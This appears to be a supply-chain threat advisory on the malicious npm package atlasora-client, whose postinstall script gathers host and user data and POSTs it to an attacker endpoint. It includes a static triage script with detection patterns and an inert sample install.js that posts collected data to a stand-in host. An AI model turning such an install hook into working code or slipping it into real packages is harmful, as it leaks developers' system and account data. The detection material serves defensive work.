Supply-chain threat intelligence

Incident detail

critical · npm · credential theft · osv

Malicious code in atlasora-client (npm)

atlasora-client

Risk score

92

AI summary

Indexed incident for atlasora-client (npm).

Description

package.json declares "postinstall": "node install.js", which npm runs automatically on npm install. install.js requires https, fs, os, and child_process; collects host identifiers via os.hostname() and os.userInfo(); invokes execSync() to gather additional system data; checks for sensitive files via fs.existsSync(); and POSTs the collected data via https.request() to a hardcoded remote endpoint. This is the canonical install-time system-information exfiltration shape: any developer or CI machine that runs npm install atlasora-client will silently leak host identity, user account info, and reconnaissance data about local filesystem contents to an attacker-controlled destination.
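A static triage check for the shape described above, as an added example that is not code from the advisory or from the package. The function names, the verdict labels, and both sample packages (including the host collector.example.invalid) are assumptions constructed for illustration; the check reads package contents as text and never executes them.

```javascript
// Added example: static triage for the install-time exfiltration shape.
const HOOKS = ['preinstall', 'install', 'postinstall'];
const SIGNALS = {
  network: /require\(\s*['"](?:node:)?https?['"]\s*\)|\bhttps?\.request\s*\(/,
  exec: /require\(\s*['"](?:node:)?child_process['"]\s*\)|\bexecSync\s*\(/,
  hostId: /\bos\.(?:hostname|userInfo)\s*\(/,
  fileProbe: /\bfs\.existsSync\s*\(/,
};

// Lifecycle hooks npm runs automatically, with the script file each launches.
function lifecycleTargets(pkg) {
  const scripts = pkg.scripts || {};
  return HOOKS.filter((h) => scripts[h]).map((hook) => {
    const m = scripts[hook].match(/\bnode\s+(\S+\.[cm]?js)\b/);
    return { hook, cmd: scripts[hook], file: m ? m[1].replace(/^\.\//, '') : null };
  });
}

// files: relative path -> source text, read from the unpacked tarball.
function triage(pkg, files) {
  return lifecycleTargets(pkg).map(({ hook, cmd, file }) => {
    const src = file ? files[file] : undefined;
    if (src === undefined) return { hook, cmd, file, hits: [], verdict: 'review' };
    const hits = Object.keys(SIGNALS).filter((k) => SIGNALS[k].test(src));
    // Outbound network plus host collection, exec or file probing = block.
    const collect = hits.some((k) => k !== 'network');
    const verdict = hits.includes('network') && collect ? 'block' : 'ok';
    return { hook, cmd, file, hits, verdict };
  });
}

// Constructed sample with the calls listed in the description (inert stub).
const SUSPECT_PKG = { name: 'sample-suspect', scripts: { postinstall: 'node install.js' } };
const SUSPECT_FILES = { 'install.js': `
const https = require('https'), fs = require('fs'), os = require('os');
const { execSync } = require('child_process');
const data = { h: os.hostname(), u: os.userInfo(), f: fs.existsSync('/constructed/path') };
https.request({ host: 'collector.example.invalid', method: 'POST' });
` };
// Constructed benign sample: a build step with no network use.
const BENIGN_PKG = { name: 'sample-benign', scripts: { postinstall: 'node ./scripts/build.js' } };
const BENIGN_FILES = { 'scripts/build.js': "const fs = require('fs'); fs.existsSync('dist');" };

console.log(JSON.stringify(triage(SUSPECT_PKG, SUSPECT_FILES), null, 2));
console.log(JSON.stringify(triage(BENIGN_PKG, BENIGN_FILES), null, 2));
```

Run it against a tarball unpacked with lifecycle scripts disabled, so the package is inspected before anything in it executes.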

Technical details

Affected versions

=1.0.0

Indicators

  • affected version = 1.0.0 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
